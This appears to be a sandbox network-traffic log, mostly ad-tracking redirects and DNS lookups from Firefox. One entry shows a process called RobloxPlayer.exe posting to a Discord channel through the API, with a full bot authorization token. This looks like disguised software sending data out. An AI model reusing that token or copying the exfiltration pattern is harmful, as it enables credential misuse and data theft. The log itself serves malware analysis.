user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

date: Sun, 26 May 2024 02:06:46 GMT
content-length: 0
location: /usermatch?cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fgpp%3D%26gpp_sid%3D%26bidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=&s=184674&us_privacy=1---&C=1
cf-ray: 889a35376e91527d-LHR
cf-cache-status: DYNAMIC
cache-control: no-cache
expires: 0
set-cookie: CMID=ZlKZNrmqP2sAAG.vBVdS-wAA; Path=/; Domain=casalemedia.com; Expires=Mon, 26 May 2025 02:06:46 GMT; Max-Age=31536000; Secure; SameSite=None
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
pragma: no-cache
set-cookie: CMPS=4515; Path=/; Domain=casalemedia.com; Expires=Sat, 24 Aug 2024 02:06:46 GMT; Max-Age=7776000; Secure; SameSite=None
set-cookie: CMPRO=4515; Path=/; Domain=casalemedia.com; Expires=Sat, 24 Aug 2024 02:06:46 GMT; Max-Age=7776000; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DuG%2BgwVZy7fTcREaETbzolBRHMR7FfbQpYMSxhNQP4tPja%2F4%2BqQJ6NBW%2B5CirLhWxiYKEpnoaeWnrDiDMGtNgZUp0gVS%2B7J1DBSsFoFRGJTpcPgBm2ket%2BtyBvuCbpQBCLlQF6ubqlPWIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400
GET

https://ssum-sec.casalemedia.com/usermatch?cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fgpp%3D%26gpp_sid%3D%26bidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=&s=184674&us_privacy=1---&C=1

firefox.exe

Remote address:

172.64.151.101:443

Request

GET /usermatch?cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fgpp%3D%26gpp_sid%3D%26bidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=&s=184674&us_privacy=1---&C=1 HTTP/2.0
host: ssum-sec.casalemedia.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:47 GMT
content-type: text/html
cf-ray: 889a3537eeb2527d-LHR
cf-cache-status: DYNAMIC
cache-control: no-cache
expires: 0
pragma: no-cache
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=28vwnsooshtOKCMPDURoCizj0hvGRU6kWp9j7AV9F8r%2FxtwFAW903dvwm5YlRUfngF2%2BYzrCW6kqXVTOFC9Rgh%2BAqe00UDJAoHVTyTUmY05xBz2eqIIm3TPfm3vp5z98bGlkxb4esv6Zrw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
DNS

ssum-sec.casalemedia.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssum-sec.casalemedia.com

IN A

Response

ssum-sec.casalemedia.com

IN A

172.64.151.101

ssum-sec.casalemedia.com

IN A

104.18.36.155
DNS

ssum-sec.casalemedia.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssum-sec.casalemedia.com

IN AAAA

Response
DNS

widgets.outbrain.com

firefox.exe

Remote address:

8.8.8.8:53

Request

widgets.outbrain.com

IN A

Response

widgets.outbrain.com

IN CNAME

wildcard.outbrain.com.edgekey.net

wildcard.outbrain.com.edgekey.net

IN CNAME

e10883.g.akamaiedge.net

e10883.g.akamaiedge.net

IN A

2.21.189.145
DNS

101.151.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

101.151.64.172.in-addr.arpa

IN PTR

Response
DNS

e10883.g.akamaiedge.net

firefox.exe

Remote address:

8.8.8.8:53

Request

e10883.g.akamaiedge.net

IN A

Response

e10883.g.akamaiedge.net

IN A

2.21.189.145
DNS

e10883.g.akamaiedge.net

firefox.exe

Remote address:

8.8.8.8:53

Request

e10883.g.akamaiedge.net

IN AAAA

Response
DNS

cdn.ampproject.org

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.ampproject.org

IN A

Response

cdn.ampproject.org

IN CNAME

cdn-content.ampproject.org

cdn-content.ampproject.org

IN A

142.250.187.225
DNS

cdn-content.ampproject.org

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn-content.ampproject.org

IN A

Response

cdn-content.ampproject.org

IN A

142.250.187.225
DNS

cdn-content.ampproject.org

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn-content.ampproject.org

IN AAAA

Response

cdn-content.ampproject.org

IN AAAA

2a00:1450:4009:820::2001
DNS

eb2.3lift.com

firefox.exe

Remote address:

8.8.8.8:53

Request

eb2.3lift.com

IN A

Response

eb2.3lift.com

IN CNAME

eu-eb2.3lift.com

eu-eb2.3lift.com

IN A

76.223.111.18

eu-eb2.3lift.com

IN A

13.248.245.213
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:48 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=9c3c88521b0411efa144b28112ca8546; Expires=Fri, 25-May-2029 02:06:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689209.635
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7d3BCI4a1aK32rpD0sy4F5Cr3FWTb5sTlxsJ1vZdcMjhPeCqXHNhQkbeSpIl6WMQFimrrsNuO4CS1Po%2B5MBCrUZFySDEWKt1ECdwI3EgRph1YZPnrCMokLdKPYIm"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=9c3c88521b0411efa144b28112ca8546b3aeb131d5fc1fdee1937873eeb2ff15231418c77643a09255513b46fc68a7c6; Expires=Fri, 25-May-2029 02:06:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=a41f9ec8e112a5ef48c08140d397c03fe3ba6589-1716689208; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=c0LkgvykVrxqDcNOiN7ymgziEPHZEi3s7.soU8zdpDI-1716689208726-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a3541394d0691-LHR
GET

https://eb2.3lift.com/sync?gdpr=1&cmp_cs=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dtriplelift%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA